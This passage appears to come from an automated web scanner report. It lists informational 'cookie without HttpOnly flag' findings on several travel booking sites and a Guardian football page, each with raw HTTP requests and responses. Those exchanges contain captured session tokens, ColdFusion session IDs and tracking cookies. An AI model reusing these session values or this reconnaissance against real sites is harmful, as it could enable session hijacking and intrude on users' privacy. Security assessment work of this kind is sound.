Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...

14.236. http://www.getaroom.com/browse/market_deals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...

14.237. http://www.getaroom.com/searches/show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?destination=+&check_in=10/09/2011&check_out=10/16/2011&num_guests=1&num_rooms=1&affiliate=032ea00e HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com
X-Runtime: 7
Content-Length: 277
Set-Cookie: affiliate=032ea00e; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoQX2NzcmZfdG9rZW4iMVR4WEUwczk1eTNLa0dhMUZCZ2FIYnFzNEpPTmppTnlIUVA4ckNaYnpJVkE9Og9zZXNzaW9uX2lkIiU0ZjBiYzY1ODhkZDU2OGRkMDI3MmI1NzY4NDhkZTZmMSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--497837da868085a13e75b3c8521055c245269263; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&amp;check_out=10%2F16%2F2011&amp;destination=+&amp;num_guests=1&amp;num_rooms=1&amp;utm_campaign=Affili
...[SNIP]...

14.238. http://www.getaroom.com/searches/show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE%3D--439cabc6f716d9f1cd805153e9ac86b053180a4c

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/
X-Runtime: 22
Content-Length: 90
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DUY6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--ca4f0b0b5d11bae9b110fc0efc9cbe24aba9e868; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/">redirected</a>.</body></html>

14.239. http://www.getaroom.com/washington-dc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...

14.240. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...

14.241. http://www.hotelplanner.com/Search/Index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...

14.242. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

14.243. http://www.hotels.com/PPCHotelDetails

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCHotelDetails

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCHotelDetails?hotelid=205543&arrivalDate=14/10/2011&departureDate=16/10/2011&adultsPerRoom=2&numberOfRooms=1&view=rates&PRSC=TAJ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSLB=1; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMDMuNC4xLmk2OjE3MS4xLjA6MTMwLjEuMS5pMjo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6Mi4yLjE6MTk2LjEuMDoyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjE5NS4wLjA6MTA0LjAuMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Location: http://www.hotels.com/hotel/details.html?tab=prices&destinationId=1401516&destination=Boston%2C+Massachusetts%2C+United+States&hotelId=205543&arrivalDate=10-14-11&departureDate=10-16-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:16 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/
